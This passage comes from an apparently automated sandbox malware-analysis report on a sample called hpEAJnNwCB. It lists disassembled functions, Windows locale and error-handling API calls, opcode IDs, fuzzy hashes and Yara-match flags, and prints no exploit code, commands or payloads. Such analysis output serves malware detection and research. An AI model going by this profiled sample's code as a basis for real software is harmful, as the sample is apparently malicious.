                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: /
                                                                                                                                                                                                                                            • API String ID: 0-2043925204
                                                                                                                                                                                                                                            • Opcode ID: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                                                                                                                                                                                                            • Instruction ID: b1d1c733bd69e792f2c7091433d2a564ecb1a1065cd437496777377bd66813c7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A412B725003196FCB20AFB9DC49EBBB778EB88714F50566EF905D7280EA34AD41CB58
                                                                                                                                                                                                                                            Function 004351C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430213,?,00000004), ref: 00435213
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                                                                            • String ID: GetLocaleInfoEx
                                                                                                                                                                                                                                            • API String ID: 2299586839-2904428671
                                                                                                                                                                                                                                            • Opcode ID: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
                                                                                                                                                                                                                                            • Instruction ID: 6c622d5e0ad0a6d1c05e93c1424bc95a701370efe176ef79413d4e55be9de99b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 97F02B31680318BBDB016F51CC02F6F7B21EF18B02F10006BFC0567290DA799E20AADE
                                                                                                                                                                                                                                            Function 024BED47 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
                                                                                                                                                                                                                                            • Instruction ID: 6bc98911374f568c0420925b4315458e0cf8497bb0fef3618f73e48cfaf34742
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F0022B71E002199BDF15CFA9C9806EEB7F1EF88314F15866AE919E7380D731A945CF90
                                                                                                                                                                                                                                            Function 02492605 Relevance: 3.1, APIs: 2, Instructions: 125nativewindowCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 0249262C
                                                                                                                                                                                                                                            • PostQuitMessage.USER32(00000000), ref: 024927CA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: MessageNtdllPostProc_QuitWindow
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4264772764-0
                                                                                                                                                                                                                                            • Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                                                                                                                                                                                            • Instruction ID: 7fed65e829bdb85d7086353b8c6347e6979f9d2d992ed28c86823371e4499b97
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7F412125964344A5E731FFA5BC45B2637B0FF64B26F10252BD528CB2B2E3B28540C75E
                                                                                                                                                                                                                                            Function 024C6F26 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,024C6F21,?,?,00000008,?,?,024CF3E2,00000000), ref: 024C7153
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionRaise
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3997070919-0
                                                                                                                                                                                                                                            • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                                                                                                                                                            • Instruction ID: 14ef7885017bb4ceecc72a04d284f4eca1241b39c27560258c8e6703b9305fb5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DFB127392106089FD755CF2CC48AB65BBA4FB45368F29865DE89ACF3A1C735D982CF40
                                                                                                                                                                                                                                            Function 00436CBF Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CBA,?,?,00000008,?,?,0043F17B,00000000), ref: 00436EEC
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionRaise
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3997070919-0
                                                                                                                                                                                                                                            • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                                                                                                                                                            • Instruction ID: 64e3da0580c1687aacde15a9aed21cd267913b72937e2db5c37d982a735c0e1f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 69B17D35210609EFD714CF28C48AB657BE0FF09324F26D659E899CF2A1C339E992CB44
                                                                                                                                                                                                                                            Function 024CB8AC Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: GetLastError.KERNEL32(?,?,024BA9EC,?,00000000,?,024BCDE6,0249247E,00000000,?,00451F20), ref: 024C2145
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: _free.LIBCMT ref: 024C2178
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21B9
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: _free.LIBCMT ref: 024C21A0
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21AD
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 024CB900
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$_free$InfoLocale
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2955987475-0
                                                                                                                                                                                                                                            • Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                                                                                                                                                                                                            • Instruction ID: 80cf140e91eb6a6325efdfb889abfd38af81fc0c9933d2cf9e9882f1444081a0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD21B03A95420AABDF689E2DDC42BBA77ACEB04318F20017FED01D6250EB759944CB50
                                                                                                                                                                                                                                            Function 0043B645 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                              • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                              • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                              • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                                                                                                                                                                                                              • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B699
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$_free$InfoLocale
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2955987475-0
                                                                                                                                                                                                                                            • Opcode ID: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
                                                                                                                                                                                                                                            • Instruction ID: d046272b768734764790121d12bbe36070ecd09619f9604c2cd6a0fe40238023
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B421B67251020AABDB249E65CC42BBB73A8EF48314F10107BFE01D6281EB79DD44CB99
                                                                                                                                                                                                                                            Function 024CB534 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: GetLastError.KERNEL32(?,?,024BA9EC,?,00000000,?,024BCDE6,0249247E,00000000,?,00451F20), ref: 024C2145
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: _free.LIBCMT ref: 024C2178
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21B9
                                                                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,024C0A1C,?,024CBC89,00000000,?,?,?), ref: 024CB5A6
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2016158738-0
                                                                                                                                                                                                                                            • Opcode ID: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
                                                                                                                                                                                                                                            • Instruction ID: 90f12ea98e8d04160b3d421ad7a2fa3c11264305ff5f77461d81fa701db64628
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D11C63A2007055FDB189F3DC89267ABB92FF8475CB25442DD94687740D771A542CB40
                                                                                                                                                                                                                                            Function 0043B2CD Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                              • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                              • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,004307B5,?,0043BA22,00000000,?,?,?), ref: 0043B33F
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2016158738-0
                                                                                                                                                                                                                                            • Opcode ID: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
                                                                                                                                                                                                                                            • Instruction ID: 7307f244e070286786186ca11be292e9958ff85af34fd5d1bf47ea8df294ed07
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D91106362007019FDB189F3988917BBB791FF84318F15452DEA8687B40D375A902C784
                                                                                                                                                                                                                                            Function 024CBADC Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: GetLastError.KERNEL32(?,?,024BA9EC,?,00000000,?,024BCDE6,0249247E,00000000,?,00451F20), ref: 024C2145
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: _free.LIBCMT ref: 024C2178
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21B9
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,024CB87A,00000000,00000000,?), ref: 024CBB08
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$InfoLocale_free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 787680540-0
                                                                                                                                                                                                                                            • Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                                                                                                                                                                                            • Instruction ID: 1115fa2ab215e34a2e4971d1695d130c9bdf8dd89431bb16d99b8b0971c6c7d2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E4F0F93AA001166BDB689A29CC46BBB7768EF4071CF24046EDD05A3644FB70BE42CAD0
                                                                                                                                                                                                                                            Function 0043B875 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                              • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                              • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B613,00000000,00000000,?), ref: 0043B8A1
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$InfoLocale_free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 787680540-0
                                                                                                                                                                                                                                            • Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                                                                                                                                                                                                            • Instruction ID: 37b951b57323e1638715454beaabcd8ff4bbdb448c8d666509202632d17d74d0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 72F0F932910115BFDB2C6A6588057BB776CEF44764F15542FEE05A3280EB39FE4287D8
                                                                                                                                                                                                                                            Function 024CB8A3 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: GetLastError.KERNEL32(?,?,024BA9EC,?,00000000,?,024BCDE6,0249247E,00000000,?,00451F20), ref: 024C2145
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: _free.LIBCMT ref: 024C2178
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21B9
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: _free.LIBCMT ref: 024C21A0
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21AD
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 024CB900
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$_free$InfoLocale
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2955987475-0
                                                                                                                                                                                                                                            • Opcode ID: d32582cdea7e1768c45f561c62b89e044e33708acaf6235ec9442aa70aeaeee6
                                                                                                                                                                                                                                            • Instruction ID: ffef62fb7703a98d6accad780bcbb6860a26bbd15c394bcd3c75001c5ce1da19
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d32582cdea7e1768c45f561c62b89e044e33708acaf6235ec9442aa70aeaeee6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4D014936B511049BCB18EF38DD41ABA33A9DF04315F1441BFEE02DB281DAB55D048B50
                                                                                                                                                                                                                                            Function 024CB5CF Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: GetLastError.KERNEL32(?,?,024BA9EC,?,00000000,?,024BCDE6,0249247E,00000000,?,00451F20), ref: 024C2145
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: _free.LIBCMT ref: 024C2178
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21B9
                                                                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,024C0A1C,?,024CBC4D,024C0A1C,?,?,?,?,?,024C0A1C,?,?), ref: 024CB61B
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2016158738-0
                                                                                                                                                                                                                                            • Opcode ID: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
                                                                                                                                                                                                                                            • Instruction ID: 36ea6ead7d9f71a99500d584cce1c5411a3792ed85fcf48559a88f30f12426a4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 47F0C23A300B055FDB246F3DDC82B7A7B95EF8076CF25442EFA458B650D7B198028A44
                                                                                                                                                                                                                                            Function 0043B368 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                              • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                              • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,004307B5,?,0043B9E6,004307B5,?,?,?,?,?,004307B5,?,?), ref: 0043B3B4
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2016158738-0
                                                                                                                                                                                                                                            • Opcode ID: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
                                                                                                                                                                                                                                            • Instruction ID: e409c1f6f572afb8e53c6bef185f66c51efc5fed4ad0f11af6fa15d84cefb54f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 84F022362007045FDB159F3ADC91B6A7B90EF84328F15442EFE028B680D7B5AC028684
                                                                                                                                                                                                                                            Function 024C5427 Relevance: 1.5, APIs: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,024C047A,?,00000004), ref: 024C547A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2299586839-0
                                                                                                                                                                                                                                            • Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                                                                                                                                                                                                            • Instruction ID: dca8ab5af1adc2672d4bbfe0e8776cca0df0ae969c2942eae3b04f6a0a4553e0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4BF0F635680318BBDB016F55CC01F6E7B26EF04B12F50411EFC05B6290DA719920AA99
                                                                                                                                                                                                                                            Function 024C5034 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 024BE654: RtlEnterCriticalSection.NTDLL(02040DAF), ref: 024BE663
                                                                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 024C506C
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1272433827-0
                                                                                                                                                                                                                                            • Opcode ID: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
                                                                                                                                                                                                                                            • Instruction ID: a848064e3ab137f7a738fd8805346c89e514351159180fc2dde1a190d98b60a3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B5F08732A20304DFEB10EF69D801B8C77E1AF15B21F10426AF904DB2A1CB7999448F4A
                                                                                                                                                                                                                                            Function 00434DCD Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
